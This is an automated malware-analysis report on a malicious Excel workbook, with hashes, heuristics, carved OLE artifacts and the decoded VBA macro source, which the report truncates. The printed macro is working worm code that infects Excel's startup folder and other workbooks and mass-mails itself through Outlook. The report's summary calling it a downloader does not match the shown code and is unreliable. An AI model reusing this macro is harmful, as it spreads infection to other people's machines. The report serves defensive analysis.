Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 0cf2e878cb2b2170…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 473.0 KB
Created: 2000-10-04 08:10:43
Authoring application: Microsoft Excel
First seen: 2012-06-14
MD5: 55e4a0276902d1c1616d1d691a8329a2
SHA-1: cd6cb4cd14fe964a9151cd5c36204dfa62e05e9a
SHA-256: 0cf2e878cb2b217060094b6837045256369fa873eaa3e9ba72fcb7ca9ed2b496
Risk score: 142

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment

The file is an Excel document containing a VBA macro with an Auto_Open subroutine, which runs automatically when the workbook is opened. Together with a CreateObject call, this indicates an attempt to execute arbitrary code. The macro likely serves as a downloader for a second-stage payload, and the embedded OLE packages suggest further malicious content. The Auto_Open macro and the CreateObject call are strong indicators of malicious intent, consistent with spearphishing-attachment tactics.

Heuristics (5)

  • VBA macros detected [medium] (3 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Open macro [high] OLE_VBA_AUTO
    Auto_Open macro
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where the visible source is unavailable.
  • Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts (5)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15068 bytes
SHA-256: 165694809904067ebfafeccc9f70c267dadd771f3382ba3b792859dfc96fa758
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Sheet611"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True



Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "List1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "List2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "List3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "EGManalo"
'...........................................
'INC: 86 years and going strong. More power!
'July 26, 1914
'
'Electronics and Communications Engineering
'New Era University
'Milton Hills Subd., Diliman, Quezon City
'...........................................
'By AnGeL - Anak ng Sugo
'...........................................


Sub Auto_Open()
        Application.OnSheetActivate = "Run"
End Sub
Sub Send()

On Error Resume Next
MsgBox ("yes")
Set OL = CreateObject("Outlook.Application")
Set UNS = OL.GetNamespace("MAPI")

Set UIB = UNS.GetDefaultFolder(6)

ActiveWorkbook.Save
Att = ActiveWorkbook.FullName

For i = 1 To UIB.Items.Count
    Set M = UIB.Items(i)
    Set Z = M.Reply
    A = MsgBox(Z.Recipients(1).Address)
    Set FM = OL.CreateItem(0)
    FM.Recipients.Add A
    FM.Attachments.Add Att
    FM.Send
Next

Set OL = Nothing
Set UNS = Nothing

End Sub
Sub Run()
        
On Error GoTo Over

SU$ = Application.StartupPath
F$ = Dir(SU$ & "\" & "Happy Anniversary.xls")
ngayon = Format(Now, "yyyymmdd")
'MsgBox (Application.Version)

If F$ <> "Happy Anniversary.xls" Then GoTo FDNE Else GoTo IOF

FDNE:
         
   INF$ = ActiveWorkbook.Name
   
   Application.ScreenUpdating = False

   Set bago = Workbooks.Add
    With bago
        .Title = ""
        .Subject = ""
    End With
   
   NWB$ = ActiveWorkbook.Name
   Bed$ = Workbooks(NWB$).Sheets(1).Name

   If Bed$ <> "EGManalo" _
      Then
        Workbooks(INF$).Sheets("THE CHURCH OF CHRIST").Copy Before:=Workbooks(NWB$).Sheets(1)
        'Workbooks(INF$).Sheets("EGManalo").Copy Before:=Workbooks(NWB$).Sheets(1)
        'Workbooks(NWB$).Sheets("EGManalo").Visible = False
        Workbooks(INF$).VBProject.VBComponents("EGManalo").Export ("c:\1")
        Workbooks(NWB$).VBProject.VBComponents.Import ("c:\1")
        Workbooks(NWB$).Sheets("THE CHURCH OF CHRIST").Visible = False
      Else
   End If

   ActiveWindow.Visible = False
      
   Workbooks(NWB$).SaveAs Filename:=Application.StartupPath & "/" & "Happy Anniversary.xls"

GoTo Over

IOF:
        
   Angelo$ = ActiveWorkbook.Name
   For i = 1 To Workbooks(Angelo$).VBProject.VBComponents.Count
   If Workbooks(Angelo$).VBProject.VBComponents(i).Type = 1 Then _
   If Workbooks(Angelo$).VBProject.VBComponents(i).Name = "EGManalo" Then GoTo Brk
   Next
   i = i - 1
Brk:
   FirstBed$ = Workbooks(Angelo$).VBProject.VBComponents(i).Name
        
   Application.ScreenUpdating = False
   
   If FirstBed$ <> "EGManalo" _
      Then
        'Workbooks("Happy Anniversary.xls").Sheets("EGManalo").Copy Before:=Workbooks(Angelo$).Sheets(1)
        Workbooks("Happy Anniversary.xls").VBProject.VBComponents("EGMan
... (truncated)
ole10native_00.bin | ole-package | OLE Ole10Native stream: MBD0000933E/Ole10Native | 38180 bytes
SHA-256: 3e8003715f57c8fbf5f4d62053403aef6ba4e20b8e869c2b3738b8a60d920f5b
ole10native_01.bin | ole-package | OLE Ole10Native stream: MBD00009347/Ole10Native | 36676 bytes
SHA-256: a7e601393bc6d38a6aceb5658cdd76874414a505a9136399746a9476d647a2e6
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact entropy is 7.56, consistent with packed or encrypted content.
ole10native_02.bin | ole-package | OLE Ole10Native stream: MBD0000934C/Ole10Native | 31236 bytes
SHA-256: 49c7dc99321ba74d0808c8ba6bdf83e50b17eb7f18337e2692f946e2d2c63d25
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact entropy is 7.45, consistent with packed or encrypted content.
ole10native_03.bin | ole-package | OLE Ole10Native stream: MBD0000934D/Ole10Native | 105220 bytes
SHA-256: 0564ccfcc8b704bb8f893dedd52ef3a82130caad9c64008c5229b321dbacf00a